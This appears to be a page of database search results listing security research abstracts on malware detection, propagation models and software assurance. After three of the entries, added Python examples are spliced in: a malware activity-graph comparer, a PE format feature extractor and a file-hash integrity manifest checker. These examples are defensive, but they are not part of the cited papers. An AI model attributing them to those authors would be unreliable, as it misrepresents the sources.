  13. Physician use of updated anti-virus software in a tertiary Nigerian hospital.

    PubMed

    Laabes, E P; Nyango, D D; Ayedima, M M; Ladep, N G

    2010-01-01

    While physicians are becoming increasingly dependent on computers and the internet, highly lethal malware continues to be loaded into cyberspace. We sought to assess the proportion of physicians with updated anti-virus software in Jos University Teaching Hospital, Nigeria, and to determine perceived barriers to getting updates. We used a pre-tested semi-structured self-administered questionnaire to conduct a cross-sectional survey among 118 physicians. The mean age (+/- SD) of subjects was 34 (+/- 4) years, with 94 male and 24 female physicians. Forty-two (36.5%) of 115 physicians with anti-virus software used an updated program (95% CI: 27, 45). The top three antivirus software were: McAfee 40 (33.9%), AVG 37 (31.4%) and Norton 17 (14.4%). Common infections were: Trojan horse 22 (29.7%), Brontok worm 8 (10.8%), and Ravmonlog.exe 5 (6.8%). Internet browsing with a firewall was an independent determinant for use of updated anti-virus software [OR 4.3, 95% CI, 1.86, 10.02; P < 0.001]. Busy schedule, 40 (33.9%), and lack of a credit card, 39 (33.1%), were perceived barriers to updating antivirus software. The use of regularly updated anti-virus software is sub-optimal among physicians, implying vulnerability to computer viruses. Physicians should be careful with flash drives and should avoid being victims of the raging arms race between malware producers and anti-virus software developers.

  14. IT Security Support for the Spaceport Command Control Systems Development Ground Support Development Operations

    NASA Technical Reports Server (NTRS)

    Branch, Drew A.

    2014-01-01

    Security is one of the most, if not the most, important areas today. After the several attacks on the United States, security everywhere has heightened, from airports to the communication among the military branches' legionnaires. With advanced persistent threats (APTs) on the rise following Stuxnet, government branches and agencies are required, more than ever, to follow several standards, policies and procedures to reduce the likelihood of a breach. Attack vectors today are very advanced and are going to continue to get more and more advanced as security controls advance. This creates a need for networks and systems to be in an updated and secured state in a launch control system environment. FISMA is a law that is mandated by the government to follow when government agencies secure networks and devices. My role on this project is to ensure network devices and systems are in compliance with NIST, as outlined in FISMA. I will achieve this by providing assistance with security plan documentation and collection, system hardware and software inventory, malicious code and malware scanning, and configuration of network devices, i.e. routers and IDSs/IPSs. In addition, I will be completing security assessments on software and hardware, vulnerability assessments and reporting, and conducting patch management and risk assessments. A guideline that will help with compliance with NIST is the SANS Top 20 Critical Controls. The SANS Top 20 Critical Controls, as well as numerous security tools, security software and the conducting of research, will be used to successfully complete the tasks given to me. This will ensure compliance with FISMA and NIST, secure systems and a secured network. By the end of this project, I hope to have carried out the tasks stated above as well as gained an immense knowledge about compliance, security tools, networks and network devices, as well as policies and procedures.

  15. IT Security Support for the Spaceport Command Control Systems Development Ground Support Development Operations

    NASA Technical Reports Server (NTRS)

    Branch, Drew

    2013-01-01

    Security is one of the most, if not the most, important areas today. After the several attacks on the United States, security everywhere was heightened, from airports to the communication among the military branches' legionnaires. With advanced persistent threats (APTs) on the rise following Stuxnet, government branches and agencies are required, more than ever, to follow several standards, policies and procedures to reduce the likelihood of a breach. Attack vectors today are very advanced and are going to continue to get more and more advanced as security controls advance. This creates a need for networks and systems to be in an updated and secured state in a launch control system environment. FISMA is a law that is mandated by the government to follow when government agencies secure networks and devices. My role on this project is to ensure network devices and systems are in compliance with NIST, as outlined in FISMA. I will achieve this by providing assistance with security plan documentation and collection, system hardware and software inventory, malicious code and malware scanning, and configuration of network devices, i.e. routers and IDSs/IPSs. In addition, I will be completing security assessments on software and hardware, vulnerability assessments and reporting, and conducting patch management and risk assessments. A guideline that will help with compliance with NIST is the SANS Top 20 Critical Controls. The SANS Top 20 Critical Controls, as well as numerous security tools, security software and the conducting of research, will be used to successfully complete the tasks given to me. This will ensure compliance with FISMA and NIST, secure systems and a secured network. By the end of this project, I hope to have carried out the tasks stated above as well as gained an immense knowledge about compliance, security tools, networks and network devices, policies and procedures.

  16. Operationalizing Cyberspace for Today’s Combat Air Force

    DTIC Science & Technology

    2010-04-01

    rootkit techniques to run inside common Windows services (sometimes bundled with fake antivirus software) or in Windows safe mode, and it can hide...has shifted to downloading other malware, with its main focus on fake alerts and rogue antivirus software. 5. TR/Dldr.Agent.JKH - Compromised U.S...patch, software update, or security breach away from failure. In short, what works AU/ACSC/SIMMONS/AY10 today, may not work tomorrow; this fact

  17. Neural Detection of Malicious Network Activities Using a New Direct Parsing and Feature Extraction Technique

    DTIC Science & Technology

    2015-09-01

    intrusion detection systems, neural networks... detection system (IDS) software, which learns to detect and classify network attacks and intrusions through prior training data. With the added criteria of...BACKGROUND The growing threat of malicious network activities and intrusion attempts makes intrusion detection systems (IDS) a

  18. Behavioral biometrics for verification and recognition of malicious software agents

    NASA Astrophysics Data System (ADS)

    Yampolskiy, Roman V.; Govindaraju, Venu

    2008-04-01

    Homeland security requires technologies capable of positive and reliable identification of humans for law enforcement, government, and commercial applications. As artificially intelligent agents improve in their abilities and become a part of our everyday life, the possibility of using such programs for undermining homeland security increases. Virtual assistants, shopping bots, and game playing programs are used daily by millions of people. We propose applying statistical behavior modeling techniques developed by us for recognition of humans to the identification and verification of intelligent and potentially malicious software agents. Our experimental results demonstrate feasibility of such methods for both artificial agent verification and even for recognition purposes.

  19. Scalability Assessments for the Malicious Activity Simulation Tool (MAST)

    DTIC Science & Technology

    2012-09-01

    the scalability characteristics of MAST. Specifically, we show that an exponential increase in clients using the MAST software does not impact network and system resources significantly. Additionally, we...

  20. Code White: A Signed Code Protection Mechanism for Smartphones

    DTIC Science & Technology

    2010-09-01

    analogous to computer security is the use of antivirus (AV) software. AV software is a brute force approach to security. The software...these users, numerous malicious programs have also surfaced. And while smartphones have desktop-like capabilities to execute software, they do not...

  1. REDIR: Automated Static Detection of Obfuscated Anti-Debugging Techniques

    DTIC Science & Technology

    2014-03-27

    analyzing code samples that resist other forms of analysis. 2.5.6 RODS and HASTI: Software Engineering Cognitive Support Software Engineering (SE) is another...and (c) this method is resistant to common obfuscation techniques. To achieve this goal, the Data/Frame sensemaking theory guides the process of...No Starch Press, 2012. [46] C.-W. Hsu, S. W. Shieh et al., “Divergence Detector: A Fine-Grained Approach to Detecting VM-Awareness Malware,” in

  2. Unique Approach to Threat Analysis Mapping: A Malware Centric Methodology for Better Understanding the Adversary Landscape

    DTIC Science & Technology

    2016-04-05

    CMU/SEI-2016-TR-004, Software Engineering Institute, Carnegie Mellon University (http://www.sei.cmu.edu). Distribution Statement A: Approved for Public Release; Distribution is Unlimited. Copyright 2016 Carnegie Mellon University. This material is based upon work funded and supported by the Department of Homeland Security under Contract No. FA8721-05-C-0003 with Carnegie Mellon University for the operation of the Software...

  3. CrossTalk. The Journal of Defense Software Engineering. Volume 25, Number 2

    DTIC Science & Technology

    2012-04-01

    attacks is expanding to engulf the compact world of smartphones. by Aditya K. Sood and Richard J. Enbody A Practical Approach to Securing and Managing...provide a vulnerable entry point to our mobile device information systems. As a result, hackers are able to quickly exploit software on smartphones...MOBILE WORLD 4 CrossTalk—March/April 2012 Abstract. The sphere of malware attacks is expanding to engulf the compact world of smartphones. This paper

  4. Prospects for Evidence-Based Software Assurance: Models and Analysis

    DTIC Science & Technology

    2015-09-01

    virtual machine is much lighter than the workstation. The virtual machine doesn't need to run anti-virus, firewalls, intrusion prevention systems...34] Maiorca, D., Corona, I., and Giacinto, G. Looking at the bag is not enough to find the bomb: An evasion of structural methods for malicious PDF...CCS '13, ACM, pp. 119–130. [35] Maiorca, D., Giacinto, G., and Corona, I. A pattern recognition system for malicious PDF files detection. In

  5. A Study and Taxonomy of Vulnerabilities in Web Based Animation and Interactivity Software

    DTIC Science & Technology

    2010-12-01

    Flash Player is available as a plugin for most common Web browsers (Firefox, Mozilla, Netscape, Opera) and as an ActiveX control for Internet...script or HTML via (1) a swf file that uses the asfunction: protocol or (2) the navigateToURL function when used with the Flash Player ActiveX ...malicious page or open a malicious file. 2. Coding an Exploit The specific flaw exists in the Flash Player ActiveX Control’s handling of the

  6. Modeling the propagation of mobile malware on complex networks

    NASA Astrophysics Data System (ADS)

    Liu, Wanping; Liu, Chao; Yang, Zheng; Liu, Xiaoyang; Zhang, Yihao; Wei, Zuxue

    2016-08-01

    In this paper, the spreading behavior of malware across mobile devices is addressed. By modeling mobile networks as complex networks that follow a power-law degree distribution, a novel epidemic model for mobile malware propagation is proposed. The spreading threshold that determines the dynamics of the model is calculated. Theoretically, the asymptotic stability of the malware-free equilibrium is confirmed when the threshold is below unity, and global stability is further proved under some sufficient conditions. The influences of the model parameters and of the network topology on malware propagation are also analyzed. Our theoretical studies and numerical simulations show that networks with higher heterogeneity are conducive to the diffusion of malware, and that complex networks with lower power-law exponents favor malware spreading.

  7. Visualization techniques for malware behavior analysis

    NASA Astrophysics Data System (ADS)

    Grégio, André R. A.; Santos, Rafael D. C.

    2011-06-01

    Malware spread via the Internet is a major security threat, so studying its behavior is important for identifying and classifying it. Using SSDT hooking we can capture malware behavior by running it in a controlled environment and recording its interactions with the target operating system: file, process, registry, network and mutex activity. This generates a chain of events that can be compared with those of other known malware. In this paper we present a simple approach to convert malware behavior into activity graphs and show some visualization techniques that can be used to analyze malware behavior, individually or in groups.
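    The event-chain-to-activity-graph step described above, as an added example that is not code from the paper: three behavior traces are constructed in the (process, operation, target) shape a kernel-hook monitor produces (they are made-up samples, not captures, and the SSDT hooking itself is out of scope), volatile values are normalized so variants of one family compare as similar, and graphs are compared by Jaccard similarity of their edge sets and emitted as Graphviz DOT for visualization. The normalization rules and the comparison metric are this example's choices.

```python
import re

# Constructed behavior traces: (process, operation, target). Not real captures.
TRACE_A = [
    ("dropper.exe", "file_create", "C:\\Windows\\svc.exe"),
    ("dropper.exe", "process_create", "svc.exe"),
    ("svc.exe", "registry_set", "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\svc"),
    ("svc.exe", "mutex_create", "Global\\x1"),
    ("svc.exe", "network_connect", "198.51.100.7:443"),
]
TRACE_B = [  # a variant of A: different dropper name, mutex name and C2 address
    ("update.exe", "file_create", "C:\\Windows\\svc.exe"),
    ("update.exe", "process_create", "svc.exe"),
    ("svc.exe", "registry_set", "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\svc"),
    ("svc.exe", "mutex_create", "Global\\x2"),
    ("svc.exe", "network_connect", "203.0.113.9:443"),
]
TRACE_C = [  # a benign installer
    ("setup.exe", "file_create", "C:\\Program Files\\App\\app.exe"),
    ("setup.exe", "registry_set", "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\App"),
    ("setup.exe", "process_create", "app.exe"),
]

IP_PORT = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}:(\d+)$")


def normalize_target(op, target):
    """Abstract away values that change per build or per victim (here: the C2 address,
    keeping the port) so two samples of one family produce overlapping graphs."""
    if op == "network_connect":
        m = IP_PORT.match(target)
        if m:
            return "<ip>:" + m.group(1)
    return target


def activity_graph(events):
    """Edges are (source process, operation, target). The process that starts the trace is
    the sample itself, whose file name is arbitrary, so it is renamed to a fixed node."""
    root = events[0][0]
    edges = set()
    for proc, op, target in events:
        src = "<sample>" if proc == root else proc
        edges.add((src, op, normalize_target(op, target)))
    return edges


def jaccard(g1, g2):
    """Similarity of two graphs as overlap of their edge sets, 0.0 (disjoint) to 1.0 (identical)."""
    union = g1 | g2
    return len(g1 & g2) / len(union) if union else 1.0


def to_dot(edges, name="sample"):
    """Graphviz DOT rendering; backslashes in Windows paths must be escaped for DOT."""
    lines = ["digraph %s {" % name]
    for src, op, dst in sorted(edges):
        lines.append('  "%s" -> "%s" [label="%s"];' % (src, dst.replace("\\", "\\\\"), op))
    lines.append("}")
    return "\n".join(lines)


if __name__ == "__main__":
    ga, gb, gc = activity_graph(TRACE_A), activity_graph(TRACE_B), activity_graph(TRACE_C)
    print("A vs B (variant):", round(jaccard(ga, gb), 3))
    print("A vs C (benign): ", round(jaccard(ga, gc), 3))
    print(to_dot(ga))
```

    The normalization decides what "the same behavior" means: without it, the variant's changed C2 address and mutex name alone would drop the similarity, so what gets abstracted should mirror what the malware author can change cheaply between builds.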

  8. Using Semantic Templates to Study Vulnerabilities Recorded in Large Software Repositories

    ERIC Educational Resources Information Center

    Wu, Yan

    2011-01-01

    Software vulnerabilities allow an attacker to reduce a system's confidentiality, availability, and integrity by exposing information, executing malicious code, and undermining system functionality that contributes to the overall system purpose and need. With new vulnerabilities discovered every day in a variety of applications and user environments,…

  9. Cyber Strategic Inquiry: Enabling Change through a Strategic Simulation and Megacommunity Concept

    DTIC Science & Technology

    2009-02-01

    malicious software embedded in thumb drives and CDs that thwarted protections, such as antivirus software, on computers. In the scenario, these...Executives for National Security • The Carlyle Group • Cassat Corporation • Cisco Systems, Inc. • Cyveillance • General Dynamics • General Motors

  10. Accurate mobile malware detection and classification in the cloud.

    PubMed

    Wang, Xiaolei; Yang, Yuexiang; Zeng, Yingzhi

    2015-01-01

    As the dominant smartphone operating system, Android has consequently attracted the attention of malware authors and researchers alike. The number of types of Android malware is increasing rapidly regardless of the considerable number of proposed malware analysis systems. In this paper, by taking advantage of the low false-positive rate of misuse detection and the ability of anomaly detection to detect zero-day malware, we propose a novel hybrid detection system based on a new open-source framework, CuckooDroid, which enables the use of Cuckoo Sandbox's features to analyze Android malware through dynamic and static analysis. Our proposed system mainly consists of two parts: an anomaly detection engine performing abnormal app detection through dynamic analysis, and a signature detection engine performing known malware detection and classification with a combination of static and dynamic analysis. We evaluate our system using 5560 malware samples and 6000 benign samples. Experiments show that our anomaly detection engine with dynamic analysis is capable of detecting zero-day malware with a low false negative rate (1.16%) and an acceptable false positive rate (1.30%); it is worth noting that our signature detection engine with hybrid analysis can accurately classify malware samples with an average positive rate of 98.94%. Considering the intensive computing resources required by static and dynamic analysis, our proposed detection system should be deployed off-device, such as in the cloud. App store markets and ordinary users can access our detection system for malware detection through a cloud service.

  11. Model and Dynamic Behavior of Malware Propagation over Wireless Sensor Networks

    NASA Astrophysics Data System (ADS)

    Song, Yurong; Jiang, Guo-Ping

    Based on the inherent characteristics of wireless sensor networks (WSN), the dynamic behavior of malware propagation in a flat WSN is analyzed and investigated. A new model is proposed using 2-D cellular automata (CA), which extends the traditional definition of CA and establishes complete transition rules for malware propagation in WSN. Meanwhile, the model is validated through theoretical analysis and simulations. The theoretical analysis yields closed-form expressions which show good agreement with the simulation results of the proposed model. It is shown that malware propagation in WSN exhibits neighborhood saturation, which dominates the effects of increasing infectivity and limits the spread of the malware. The MAC mechanism of wireless sensor networks greatly slows down the speed of malware propagation and reduces the risk of large-scale malware prevalence in these networks. The proposed model can accurately describe the dynamic behavior of malware propagation over WSN, and can be applied in developing robust and efficient defense systems for WSN.

  12. Fractals, malware, and data models

    NASA Astrophysics Data System (ADS)

    Jaenisch, Holger M.; Potter, Andrew N.; Williams, Deborah; Handley, James W.

    2012-06-01

    We examine the hypothesis that the decision boundary between malware and non-malware is fractal. We introduce a novel encoding method derived from text mining for converting disassembled programs first into opstrings and then filtering these into a reduced opcode alphabet. These opcodes are enumerated and encoded into real floating point number format and used for characterizing the frequency of occurrence and distribution properties of malware functions for comparison with non-malware functions. We use the concept of invariant moments to characterize the highly non-Gaussian structure of the opcode distributions. We then derive Data Model based classifiers from identified features and interpolate and extrapolate the parameter sample space for the derived Data Models. This is done to examine the nature of the parameter space classification boundary between families of malware and the general non-malware category. Preliminary results strongly support the fractal boundary hypothesis, and a summary of our methods and results is presented here.

  13. Establishing Malware Attribution and Binary Provenance Using Multicompilation Techniques

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Ramshaw, M. J.

    2017-07-28

    Malware is a serious problem for computer systems and costs businesses and customers billions of dollars a year in addition to compromising their private information. Detecting malware is particularly difficult because malware source code can be compiled in many different ways and generate many different digital signatures, which causes problems for most anti-malware programs that rely on static signature detection. Our project uses a convolutional neural network to identify malware programs but these require large amounts of data to be effective. Towards that end, we gather thousands of source code files from publicly available programming contest sites and compile them with several different compilers and flags. Building upon current research, we then transform these binary files into image representations and use them to train a long-term recurrent convolutional neural network that will eventually be used to identify how a malware binary was compiled. This information will include the compiler, version of the compiler and the options used in compilation, information which can be critical in determining where a malware program came from and even who authored it.

  14. Machine Learning Based Malware Detection

    DTIC Science & Technology

    2015-05-18

    A TRIDENT SCHOLAR PROJECT REPORT NO. 440 Machine Learning Based Malware Detection by Midshipman 1/C Zane A. Markel, USN...COVERED (From - To) 4. TITLE AND SUBTITLE Machine Learning Based Malware Detection 5a. CONTRACT NUMBER 5b. GRANT NUMBER 5c. PROGRAM...suitably be projected into realistic performance. This work explores several aspects of machine learning based malware detection. First, we

  15. A Study of Malware Propagation via Online Social Networking

    NASA Astrophysics Data System (ADS)

    Faghani, Mohammad Reza; Nguyen, Uyen Trang

    The popularity of online social networks (OSNs) has attracted malware creators who use OSNs as a platform to propagate automated worms from one user's computer to another's. However, the topic of malware propagation in OSNs has only been investigated recently. In this chapter, we discuss recent advances on the topic of malware propagation by way of online social networking. In particular, we present three malware propagation techniques in OSNs, namely cross site scripting (XSS), Trojan and clickjacking types, and their characteristics via analytical models and simulations.

  16. Protecting software agents from malicious hosts using quantum computing

    NASA Astrophysics Data System (ADS)

    Reisner, John; Donkor, Eric

    2000-07-01

    We evaluate how quantum computing can be applied to security problems for software agents. Agent-based computing, which merges technological advances in artificial intelligence and mobile computing, is a rapidly growing domain, especially in applications such as electronic commerce, network management, information retrieval, and mission planning. System security is one of the more prominent research areas in agent-based computing, and the specific problem of protecting a mobile agent from a potentially hostile host is one of the most difficult of these challenges. In this work, we describe our agent model, and discuss the capabilities and limitations of classical solutions to the malicious host problem. Quantum computing may be extremely helpful in addressing the limitations of classical solutions to this problem. This paper highlights some of the areas where quantum computing could be applied to agent security.

  17. A malware detection scheme based on mining format information.

    PubMed

    Bai, Jinrong; Wang, Junfeng; Zou, Guozhong

    2014-01-01

    Malware has become one of the most serious threats to computer information systems, and current malware detection technology still has very significant limitations. In this paper, we propose a malware detection approach based on mining the format information of PE (portable executable) files. Based on in-depth analysis of the static format information of PE files, we extracted 197 features from the format information and applied feature selection methods to reduce the dimensionality of the features while achieving acceptably high performance. When the selected features were trained using classification algorithms, the results of our experiments indicate that the accuracy of the top classification algorithm is 99.1% and the value of the AUC is 0.998. We designed three experiments to evaluate the performance of our detection scheme and its ability to detect unknown and new malware. Although the experimental results of identifying new malware are not perfect, our method is still able to identify 97.6% of new malware with a 1.3% false positive rate.

  18. A Malware Detection Scheme Based on Mining Format Information

    PubMed Central

    Bai, Jinrong; Wang, Junfeng; Zou, Guozhong

    2014-01-01

    Malware has become one of the most serious threats to computer information systems, and current malware detection technology still has very significant limitations. In this paper, we propose a malware detection approach based on mining the format information of PE (portable executable) files. Based on in-depth analysis of the static format information of PE files, we extracted 197 features from the format information and applied feature selection methods to reduce the dimensionality of the features while achieving acceptably high performance. When the selected features were trained using classification algorithms, the results of our experiments indicate that the accuracy of the top classification algorithm is 99.1% and the value of the AUC is 0.998. We designed three experiments to evaluate the performance of our detection scheme and its ability to detect unknown and new malware. Although the experimental results of identifying new malware are not perfect, our method is still able to identify 97.6% of new malware with a 1.3% false positive rate. PMID:24991639
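    The two records above (17 and 18 are the same paper) describe mining PE format information for features. The paper does not list its 197 features, so the following is an added example rather than its feature set: it parses the DOS header, COFF header, PE32 optional header and section table directly with struct, computes a handful of the kind of format features such a scheme would use (section count, writable-and-executable sections, non-standard section names, entry point location, section entropy, ASLR/NX flags), and runs them over two constructed minimal PE images, one conventional and one with a packed-looking layout. The images are built by the example itself and are not real binaries.

```python
"""Mining static PE format features straight from the bytes.
Added illustration; the two PE images are constructed test inputs."""
import math
import random
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
DLL_DYNAMIC_BASE, DLL_NX_COMPAT = 0x0040, 0x0100
STANDARD_SECTIONS = {".text", ".data", ".rdata", ".bss", ".rsrc", ".reloc",
                     ".idata", ".edata", ".pdata", ".tls"}

def shannon_entropy(data):
    """Bits per byte; packed or encrypted payloads sit close to 8."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def parse_pe(blob):
    """Parse DOS header, COFF file header, PE32 optional header and section table."""
    if blob[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsections, _ts, _symptr, _nsyms, opt_size, characteristics = \
        struct.unpack_from("<HHIIIHH", blob, coff)
    opt = coff + 20
    (magic, _maj, _min, size_of_code, _init, _uninit, entry_rva, _base_code, _base_data,
     image_base, _sect_align, _file_align) = struct.unpack_from("<HBBIIIIIIIII", blob, opt)
    if magic != 0x10B:
        raise ValueError("only PE32 optional headers are handled here")
    subsystem, dll_chars = struct.unpack_from("<HH", blob, opt + 68)  # Subsystem, DllCharacteristics
    sections = []
    for i in range(nsections):
        off = opt + opt_size + 40 * i
        name, vsize, vaddr, rawsize, rawptr, _r, _l, _nr, _nl, flags = \
            struct.unpack_from("<8sIIIIIIHHI", blob, off)
        raw = blob[rawptr:rawptr + rawsize]  # on-disk bytes, alignment padding included
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "vsize": vsize, "vaddr": vaddr, "rawsize": rawsize,
                         "flags": flags, "entropy": shannon_entropy(raw)})
    return {"machine": machine, "characteristics": characteristics, "size_of_code": size_of_code,
            "entry_rva": entry_rva, "image_base": image_base, "subsystem": subsystem,
            "dll_chars": dll_chars, "sections": sections}

def extract_features(pe):
    """A few of the format features a classifier would be trained on."""
    secs = pe["sections"]
    ep = pe["entry_rva"]
    ep_sec = next((s for s in secs
                   if s["vaddr"] <= ep < s["vaddr"] + max(s["vsize"], s["rawsize"])), None)
    wx = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE
    return {
        "num_sections": len(secs),
        "wx_sections": sum(1 for s in secs if (s["flags"] & wx) == wx),
        "nonstandard_names": sum(1 for s in secs if s["name"] not in STANDARD_SECTIONS),
        "max_entropy": max((s["entropy"] for s in secs), default=0.0),
        "ep_outside_sections": ep_sec is None,
        "ep_in_nonstandard_section": ep_sec is not None and ep_sec["name"] not in STANDARD_SECTIONS,
        "aslr": bool(pe["dll_chars"] & DLL_DYNAMIC_BASE),
        "nx": bool(pe["dll_chars"] & DLL_NX_COMPAT),
    }

def build_pe(sections, entry_rva, dll_chars):
    """Assemble a minimal PE32 image for testing (constructed, not a real binary)."""
    file_align, sect_align, headers_size = 0x200, 0x1000, 0x200
    table, payload, raw_ptr, vaddr = b"", b"", headers_size, sect_align
    for name, data, flags in sections:
        rawsize = -(-len(data) // file_align) * file_align
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), len(data),
                             vaddr, rawsize, raw_ptr, 0, 0, 0, 0, flags)
        payload += data.ljust(rawsize, b"\0")
        raw_ptr += rawsize
        vaddr += -(-rawsize // sect_align) * sect_align
    opt = struct.pack("<HBBIIIIIIIII", 0x10B, 14, 0, 0, 0, 0, entry_rva, sect_align, 0,
                      0x400000, sect_align, file_align)
    opt = opt.ljust(68, b"\0") + struct.pack("<HH", 3, dll_chars)  # Subsystem, DllCharacteristics
    opt = opt.ljust(0xE0, b"\0")
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(opt), 0x0102)
    dos = b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", 0x40)  # e_lfanew -> 0x40
    return (dos + b"PE\0\0" + coff + opt + table).ljust(headers_size, b"\0") + payload

# Constructed samples: a conventional layout versus one whose entry point sits in a
# writable+executable, high-entropy, oddly named section with ASLR and NX disabled.
_rng = random.Random(1)
BENIGN = build_pe(
    [(".text", bytes([0x55, 0x8B, 0xEC, 0x33, 0xC0, 0x5D, 0xC3]) * 40,
      IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
     (".data", b"hello\0" * 50,
      IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)],
    entry_rva=0x1000, dll_chars=DLL_DYNAMIC_BASE | DLL_NX_COMPAT)
SUSPECT = build_pe(
    [(".text", b"\0" * 64, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
     (".x", bytes(_rng.randrange(256) for _ in range(4096)),
      IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)],
    entry_rva=0x2000, dll_chars=0)
```

    Feed `extract_features(parse_pe(open(path, "rb").read()))` a real PE32 file to get the same dictionary; PE32+ (64-bit) headers have a different optional-header layout and are rejected rather than misparsed. None of these features is a verdict on its own: a high-entropy section with a non-standard name is just as typical of legitimately packed software, which is why the paper trains a classifier over many such features rather than thresholding one.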

  19. A Software Assurance Framework for Mitigating the Risks of Malicious Software in Embedded Systems Used in Aircraft

    DTIC Science & Technology

    2011-09-01

    to show cryptographic signature # generation on a UNIX system # SHA=/bin/sha256 CSDB=/tmp/csdb CODEBASE=. touch "$CSDB" find "$CODEBASE" -type f...artifacts generated earlier. 81 #! /bin/sh # # Demo program to show cryptographic signature # verification on a UNIX system # SHA=/bin/sha256 CSDB=/tmp
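    The fragments above are the report's own shell scripts, which walk a code base and record a sha256 digest per file into a database ($CSDB) that is later used for verification. The following is an added example of the same scheme, not the report's scripts: it builds a sha256sum-compatible manifest of a code base, covers the manifest itself with a keyed MAC (an assumption standing in for whatever signature the report's scripts apply; a real deployment would use an asymmetric signature with the private key kept off the aircraft), and then shows the three things verification must expose: a patched binary, a deleted file, and a file that was never in the manifest. The code base and its contents are constructed inside a temporary directory.

```python
"""Build, MAC and verify a SHA-256 integrity manifest for a code base.
Added illustration; the tree, the files and the key are constructed."""
import hashlib
import hmac
import os
import tempfile

def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()

def build_manifest(codebase):
    """{relative path: sha256} for every regular file under codebase."""
    manifest = {}
    for root, _dirs, files in os.walk(codebase):
        for name in files:
            full = os.path.join(root, name)
            rel = os.path.relpath(full, codebase).replace(os.sep, "/")
            manifest[rel] = sha256_file(full)
    return manifest

def serialize(manifest):
    """sha256sum-compatible text ('<hash>  <path>'), sorted for determinism."""
    return "".join(f"{manifest[p]}  {p}\n" for p in sorted(manifest))

def parse(text):
    manifest = {}
    for line in text.splitlines():
        digest, path = line.split("  ", 1)
        manifest[path] = digest
    return manifest

def sign(text, key):
    """Keyed MAC over the manifest text; the key must not live on the verified host."""
    return hmac.new(key, text.encode(), hashlib.sha256).hexdigest()

def check(text, key, tag):
    """Constant-time comparison; verify this BEFORE trusting any manifest line."""
    return hmac.compare_digest(sign(text, key), tag)

def verify_manifest(codebase, manifest):
    """Compare the tree against the manifest: (modified, missing, added) paths."""
    current = build_manifest(codebase)
    modified = sorted(p for p in manifest if p in current and current[p] != manifest[p])
    missing = sorted(p for p in manifest if p not in current)
    added = sorted(p for p in current if p not in manifest)
    return modified, missing, added

def _write(base, rel, data):
    path = os.path.join(base, *rel.split("/"))
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as f:
        f.write(data)

def demo():
    """Constructed code base, then the tamperings the manifest must expose."""
    key = b"constructed-demo-key"          # assumption: held by the verifier, off-box
    with tempfile.TemporaryDirectory() as codebase:
        _write(codebase, "bin/fms", b"\x7fELF constructed flight management binary")
        _write(codebase, "etc/fms.conf", b"mode=normal\n")
        _write(codebase, "lib/libnav.so", b"\x7fELF constructed navigation library")
        text = serialize(build_manifest(codebase))
        tag = sign(text, key)
        clean = verify_manifest(codebase, parse(text))
        # Patch a binary, delete the config, drop a library that is not in the manifest.
        _write(codebase, "bin/fms", b"\x7fELF constructed flight management binary + implant")
        os.remove(os.path.join(codebase, "etc", "fms.conf"))
        _write(codebase, "lib/libimplant.so", b"\x7fELF constructed, not in manifest")
        dirty = verify_manifest(codebase, parse(text))
        # An attacker who can edit the manifest would also update the hash of the
        # patched binary; the MAC over the manifest text is what catches that.
        forged = text.replace(parse(text)["bin/fms"],
                              sha256_file(os.path.join(codebase, "bin", "fms")))
        return clean, dirty, check(text, key, tag), check(forged, key, tag)

if __name__ == "__main__":
    print(demo())
```

    The manifest text is the same format `sha256sum -c` reads, so the shell side of the report's workflow can consume it unchanged; what the MAC adds is protection of the manifest itself, without which "verification" only proves the tree matches whatever the attacker last wrote to $CSDB.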

  20. SEI Innovation Center Report: Cyber Intelligence Tradecraft Project: Summary of Key Findings

    DTIC Science & Technology

    2013-01-01

    source news, social media), and focuses collection on the pertinent threats and strategic needs analysts identify while learning about their...difficult to correlate with other data sources (network data, social media, chat rooms, geopolitical news sites) and complicates trend analysis or...use of commonly exploited software, prohibiting USB storage devices, and impeding access to websites associated with scams and malware make it very

  1. Lessons Learned in Cyberspace Security

    DTIC Science & Technology

    2014-06-01

    software; something undesirable is packaged together with something desirable. A classic example was the Elf Bowling attachment, which ran rampant through...the authors’ former school. It combined a fun program featuring elves as bowling pins; however, it was packaged with SubSeven (Sub7) malware that...allowed remote access to the infected machine. IExpress, which is delivered in the Windows OS, is one of the legitimate tools for packaging multiple

  2. Comprehension-Driven Program Analysis (CPA) for Malware Detection in Android Phones

    DTIC Science & Technology

    2015-07-01

